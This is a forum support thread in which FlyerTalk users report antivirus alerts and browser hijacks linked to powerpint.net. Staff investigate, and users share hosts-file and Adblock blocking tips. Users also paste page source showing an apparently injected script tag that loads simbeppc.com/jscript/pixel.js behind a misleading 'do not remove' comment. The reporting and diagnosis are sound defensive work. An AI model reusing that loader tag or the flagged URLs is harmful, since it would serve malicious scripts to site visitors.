Technical Support and Feedback - Malicious calls to powerpint.net on FT [Merged threads]

I've been getting a number of TrendMicro warnings about possible malicious code when visiting FT. Believe it's related to the MileagePlus Explorer card ads.

Error below:
http://i.imgur.com/nZll6.png

Pretty much making browsing the site unusable. Happens on all Chase ads.

Is it your virus warnings that are making browsing difficult, or is it the ads themselves? What exactly is happening?

Is it your virus warnings that are making browsing difficult, or is it the ads themselves? What exactly is happening?

Virus warning that pops to be Always on Top whenever I browser any FT page that has a Chase ad.

Hmm, well, not getting any other reports of this behavior. Not sure what to tell you at this point.

Hmm, well, not getting any other reports of this behavior. Not sure what to tell you at this point.

I suggest having your ad reps look for redirects on the Chase ads to route via powerpint.net. Right now anyone browsing your site with Trend Micro would get this result.

You can check maliciousness here:
http://global.sitesafety.trendmicro.com/
using "powerpint.net/in.cgi?2" as the destination.

I suggest having your ad reps look for redirects on the Chase ads to route via powerpint.net. Right now anyone browsing your site with Trend Micro would get this result.

You can check maliciousness here:
http://global.sitesafety.trendmicro.com/
using "powerpint.net/in.cgi?2" as the destination.

I can confirm that this is the case! :mad:

Not sure if you still have the issue... I got tired of the warning so I changed my HOSTS file.

Hi all,

Our internal malvertising team has rescanned the ads in question (Chase) and determined that the ads are safe. Also, Google's SafeBrowsing service did not flag any of the content.

Most likely the reason it was flagged is due to differences in classification of malicious content; the website VirusTotal shows that only 1 out of 17 security sites have listed the URL mentioned here as malicious. That one security site is TrendMicro (https://www.virustotal.com/url/bd943e2e1c3913b3b4fb64dbf58d80f233796c996bcb30b6fd d027db90e55b3a/analysis/).

Please let me know if we can be of any further help on this!

Paul

I am having problems browsing Flyertalk.... I am having to double click on the "Back" button on my IE browser.Used to only have to click once... and I see at the bottom of the screen a web address that has powerpint.net in the name.

That is new to me... never noticed that before.

Could be ad-related; I'll check it out.

We're not seeing it as an ad; did you try clearing your cache?

Also is it possible it's local to your machine, i.e. a bad cookie or malware? Issue has not been reported by other users as yet.

Looks like this is related to this issue I just saw in another thread:

http://www.flyertalk.com/forum/technical-issues/1311069-malicious-code-ft-ad.html

I tried clearing the cache... but still only getting the powerpint.net message at the bottom when on FT... and having to doble click the back button to get back to the previous page.

Still happening?

Tech investigations see no malicious code on the site, FYI.

Still happening?

Tech investigations see no malicious code on the site, FYI.

Had it happen to me this morning, as well as last night.

Looks like this is related to this issue I just saw in another thread:

http://www.flyertalk.com/forum/technical-issues/1311069-malicious-code-ft-ad.html

I tried clearing the cache... but still only getting the powerpint.net message at the bottom when on FT... and having to doble click the back button to get back to the previous page.

Assuming you're using Windows, edit your .hosts file to point that call to localhost

http://www.flyertalk.com/forum/technical-issues/1015335-loading-pixel-quantserve-com.html#post12819365

McAfee gave me a warning about powerprint.net.

Should I be concerned?

Cblaisd,

I am using Windows....

Not sure where to find the .hosts files though.

Assuming you're using Windows, edit your .hosts file to point that call to localhost

http://www.flyertalk.com/forum/technical-issues/1015335-loading-pixel-quantserve-com.html#post12819365

In the post I linked to, I'd recommend getting that little program (which will make the process easy).

Also seeing powerpint.net message as I switch between screens. First I ever heard of it mouthwash ain't gonna cut it.

**Did further research and testing - this "enhancement" to our browsing experience has been flagged as coda-non-grata by various corporate internet content screening utilities which are then blocking it everytime it is called up. So long as FT's site has it as a function of an advertising/marketing effort, those folks whose systems operate with minder software and who do not have admin rights to short circuit the minder software or this "enhancement" are going to be seriously annoyed. Looks like this "enhancement" is called up with every new page, so one might assume it is an eyeball tracker that has offened the Great Gods of Censure."**

That gonna work on boxes where you have no admin rights to create the file?:td: Issue just happening on FT.

Assuming you're using Windows, edit your .hosts file to point that call to localhost

http://www.flyertalk.com/forum/technical-issues/1015335-loading-pixel-quantserve-com.html#post12819365

EOTL - so long as this powerpint nuisance continues FT is DOA to me.

Hi all,

Our internal malvertising team has rescanned the ads in question (Chase) and determined that the ads are safe. Also, Google's SafeBrowsing service did not flag any of the content.

Most likely the reason it was flagged is due to differences in classification of malicious content; the website VirusTotal shows that only 1 out of 17 security sites have listed the URL mentioned here as malicious. That one security site is TrendMicro (https://www.virustotal.com/url/bd943e2e1c3913b3b4fb64dbf58d80f233796c996bcb30b6fd d027db90e55b3a/analysis/).

Please let me know if we can be of any further help on this!

Paul

Up to 2/17. Maybe it's time to ask Chase for new 3PS tags?

This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

Thank you, we are on this!

I'm getting an JavaScript Exploit error alert from my AVG on many FT pages:

simbeppc.com/jscript/pixel.js

<div align="center">

<div class="smallfont" align="center">

<!-- Do not remove or your scheduled tasks will cease to function -->

<!-- Do not remove or your scheduled tasks will cease to function -->

<script src="http://simbeppc.com/jscript/pixel.js"></script>
</div>
</div>

Very annoying! :mad: Please clean up the site....

Edit to add: also just now reported here (http://www.flyertalk.com/forum/18029870-post12.html).

Every time I navigate a page on FT, I've been getting this warning...

http://dl.dropbox.com/u/1950312/ftvirus.png

Has been happening the past 2-3 hours.

Running Chrome with AdBlockPlus.

Hmm, well, not getting any other reports of this behavior. Not sure what to tell you at this point.

I am getting constant alterts from AVG antivirus on simbeppc.com/jscript/pixel.js

here is the message text

The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: simbeppc.com/jscript/pixel.js
Name: JavaScript Obfuscation (type 156)


It make the site pretty much unuable for me. Maybe you should check the ad site to see if they are trying some exoctic tracking cookie.

Ditto.

Tech has been advised, thank you!

Thank you, we are on this!


Thanks. It's happening to me too on my iPad.

Bobette

Happening here too - very annoying.

This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

Same here on iOS (Safari) so looks site specific

I've alerted tech, thank you!

Ibobi, I did a web search and it seems to be hitting multiple InternetBrands sites (HiDef Forum for example)

This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

Yes, it's so annoying! On FF w/AdBlock Plus here.

I'm getting an JavaScript Exploit error alert from my AVG on many FT pages...
Starting about 3 days ago on Velentine's Day, I got warning of Java Exploits for at least 5 times by MSE. I see repetitive occurrence of two things:
Java/CVE-2010-0840.OQ &
Java/CVE-2010-3544.AQ.

Are they all related to malicious ad on FT?

This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

Thank you, we are on this!Fixed! I'm impressed. ^

Whatever the tech folks did, it has stopped for me (Win XP/IE8)

I am totally lost here... but so annoying.... and seems like I am not the only one having this problem. sigh!

I am totally lost here... but so annoying.... and seems like I am not the only one having this problem. sigh!
I just run into a new problem with powerpint.net. My problem is not 2-click of "Back" button though.

Two things I've noticed:

1). FT has been slowing down my browsing speed since I returned home after Chinese New Year. The significant slowness starts on January 27th. However, the slowness hasn't been consistent. There are good days and there are bad days. I just can't tell the pattern. :(

2). What just happened to me is simply shocking. I was visiting different fora on multiple tabs and decided to pay TB Topics Forum another visit.
2a). I clicked on TB Topics Forum link from FT fora home page.
2b). I then took a look at another tab.
2c). I refreshed TB Topics Forum when I returned to the TB Forum tab.

Guess where FT took me? Here: http://spi.domainsponsor.com/lander.shtml?powerpint.net :eek:

Didn't realize powerpint.net can hijack my browsing page to a total spam site. :mad:

I've also been getting it the last few days. Clearly a FT problem.

I noticed the powerpint.net message this morning, which is related to the scripting message (A script on this page is causing Internet Explorer to run slowly. If it continues to run, your computer may become unresponsive. Do you want to abort the script?) I've been getting for days on FT. FT is unusable in IE.

The other thing that has been advised many times is to use Firefox with the AdBlock extension. No ads.

The other thing that has been advised many times is to use Firefox with the AdBlock extension. No ads.
That's exactly what I use. Still that doesn't save me from all the recent acting out on FT, especially not since the Valentine's Day. :(

Well, it's a simple enough matter to edit your .hosts file either manually or via the program I linked to above.

I have the ads blocked. I use Chrome for a few sites but still prefer IE for a lot of others, including FT. (No flaming, please!)

Same here!

I have the ads blocked. I use Chrome for a few sites but still prefer IE for a lot of others, including FT. (No flaming, please!)

This may be related to a pop-up for security I am getting from:

http://domdex.com


Very annoying as I get it on every page.

I use Trend Micro to protect my computers. For the last week the protection software has detected and blocked a website from trying to get in. Sometimes as many as 4 times a minute for about 20 minutes or so then it stops....and may resume the next day when I log on or at somepoint while I am surfing. My log is showing over 176 times. I tried to trace it back to the first time using my history and it was when I was on the Alaska Air website. :rolleyes:

I have googled the website threat and nothing shows up nor does it in the Trend Micro threats encyclopedia.

While the TM software is blocking it I wonder if there is something I can do to stop these attempted break-ins.( if that is what it is)

The website: powerpint. net/ in. cgi?2 ( I put a couple spaces in there so I didn't make it live)

Any thoughts?

You have no physical firewall (I.e., your are directly connected to the Internet), your physical firewall has been compromised, your physical firewall has weak setting, or you have malware on your computer.

A good physical firewall should let you block all traffic to and from the site in question. If trend still says there is an intrusion attempt, then you have malware.

There's a discussion of it in the Technical Issues forum.

Whatever the tech folks did, it has stopped for me (Win XP/IE8)

Not for me....I have had 176 attempted attacks since February 13th.

"powerpint.net/in.cgi?2"

Trend Micro blocks it....but it still is an aggressive attempt at something.

There's a discussion of it in the Technical Issues forum.

Thanks. Good to know that I am not alone and it seems to be a FT issue that developed around the 13 of February......

Just got the powerprint.net redirect when going to the UA Crew Base thread.

http://spi.domainsponsor.com/lander.shtml?powerpint.net

Come on, IB?!

I've been seeing the powerpint.net url in my list when I try to use the back arrow. For a while my AntiMalwareBytes software was flagging it.

For me, this only happens when using IE (I'm using IE 9, if it makes any difference). I also have Firefox installed on the same machine and I don't see it. I have edited my hosts file to redirect powerpint to 127.0.0.1 so hopefully there will be no damage.

It only happens with FT and IE and it is very annoying.

I am using Chrome . But the attempted infiltration or attacks or hijacks or what ever powerpint.net was trying to do stopped 3 days ago.......

Are you still having the problem after doing the edits?

I am reluctant to make those edits.... since I am not quite sure how... :)

I've been seeing the powerpint.net url in my list when I try to use the back arrow. For a while my AntiMalwareBytes software was flagging it.

For me, this only happens when using IE (I'm using IE 9, if it makes any difference). I also have Firefox installed on the same machine and I don't see it. I have edited my hosts file to redirect powerpint to 127.0.0.1 so hopefully there will be no damage.

It only happens with FT and IE and it is very annoying.

Anyone else getting TREND MICRO OfficeScan complaining about attempts to hit http://powerpint.net/in.cgi?2 every time you load an FT page.

Anyone else getting TREND MICRO OfficeScan complaining about attempts to hit http://powerpint.net/in.cgi?2 every time you load an FT page.

Don't have TrendMicro, but my page loads often seem to get hung up on something from powerpint.net.

Hi all,

The issue has been reported but we are having trouble recreating it in house. Hold on and the tech team will keep trying to address this.

Thanks,

Paul

We're still looking into the powerpint.net issue. Thank you for reporting!

Paul

... my page loads often seem to get hung up on something from powerpint.net.
Same here. Sooooo annoying!

Two things I've noticed:

1). FT has been slowing down my browsing speed since I returned home after Chinese New Year. <snip>

2). ...
2c). I refreshed TB Topics Forum when I returned to the TB Forum tab.

Guess where FT took me? Here: http://spi.domainsponsor.com/lander.shtml?powerpint.net :eek:

Didn't realize powerpint.net can hijack my browsing page to a total spam site. :mad:

Not again! I was searching for my own posts under "My Profile." The 1st search took forever, so I decided to refresh the page then I got the powerpint hijack again :

http://spi.domainsponsor.com/lander.shtml?powerpint.net

This is too ridiculous that I just dropped FT as my FF homepage. :(

Just got the powerprint.net redirect when going to the UA Crew Base thread.

http://spi.domainsponsor.com/lander.shtml?powerpint.net

Come on, IB?!

Moved thread to tech issues. Tech is working on this.

Another powerpint hijacking when viewing the UA forum.

Anyone else getting TREND MICRO OfficeScan complaining about attempts to hit http://powerpint.net/in.cgi?2 every time you load an FT page.

Yes, I've been getting it on my work PC for a few days. Today is the first day I've started see it on my MAC. Agree it is annoying. I have been minimizing my browsing on FlyerTalk as a result.

Hi all,

I've merged these threads together so everyone can get the same messaging on this. It will make for confused reading if you try to go back and read chronologically, but what's more important is what happens going forward.

First, thank you for reporting and monitoring this issue with us. Without your data, there's no way we could track this issue. I know it's been frustrating and we've been watching this on a daily basis.

Thus far, we have been unable to find any trace of anything malicious on FT. We've looked hard and it's come up clean. So we need some additional data.

If you could, *email* me the URL (from your browser window) of the page you're on when you see the error/warning message.

IMPORTANTLY, also include the source code from the page; you do this by clicking CTRL+U (or right click and "view page source") and copy and paste it into an email to me.

My address is paul.obrien at internetbrands.com.

Thank you folks. We'll figure out what's up.

Paul

I can get it to manifest for any thread by clicking on Thread Tools, Show Printable Version...

I looked at the HTML source and this is what it shows at the bottom. Clearly something being served by the FT servers, NOT from an advertisement (or it would not show up in the HTML).

<p class="smallfont" align="center">

<br />
<script src="http://simbeppc.com/jscript/pixel.js"></script>
</p>

<br /><div style="z-index:3" class="smallfont" align="center">SEO by vBSEO 3.6.0 &copy;2011, Crawlability, Inc.</div>
</body>

</html>

Thank you for that, Hikert.

Firefox browser, just did the latest update today (finally) and now I'm getting the same problem with every FT pageload. Not happening on any other sites.

(edited to add) Just now when I posted this post, power.pint briefly came up before the post posted.

FF Browser got hijacked by powerpint.net again when visiting between fora 4 minutes ago:

1. Clicking Travel&Dining: Destination >> The World
2. Clicking Asia Forum.
3. Instead of landing in Asia, this is what I got: :td:

http://spi.domainsponsor.com/lander.shtml?powerpint.net

Message on my screen"transferring data from powerpint.net" when loading this thread page
Using FF10.0.2 with adblock. noScript & ShareMeNot

... Using FF10.0.2 with adblock ...Well, since you're already using Adblock, you might want to add a custom rule, something like:

powerpint.net^$domain=flyertalk.com

Thank you!!

Anyone else seeing "Connecting to 192.168.90.231" every time a page loads? It causes a serious delay as this is an unreachable IP address.

Is anyone still seeing the powerpint.net error at all? Please let me know if so. Should be resolved now.

Paul

Was fine a few hours ago at home. Now in the lounge at SIN and I'm getting it on every single FT page load but no other website.

Just got rerouted to http://spi.domainsponsor.com/lander.shtml?powerpint.net after clicking http://www.flyertalk.com/forum/united-mileageplus-consolidated/1319413-suggestions-small-improvements-intl-f.html.

I'm still having the powerpint issue, and the occasional domdex.com pop-up too.

Anyone still having issues? I cannot view FT via IE. It just hangs up and takes forever to load pages. Only website I have this problem on.

I now have to view FT via Firefox.

Anyone still having issues? I cannot view FT via IE. It just hangs up and takes forever to load pages. Only website I have this problem on.

I now have to view FT via Firefox.

Assuming you've cleared cookies/cache... no idea. Not getting such an issue reported widely... or even from another FTer at the moment as far as I know.

Have you tried uninstalling IE and reinstalling?

If you are looking for others to confirm it is still a problem, I can attest that the problem went away for a few days, but it has returned on my home computer (using IE).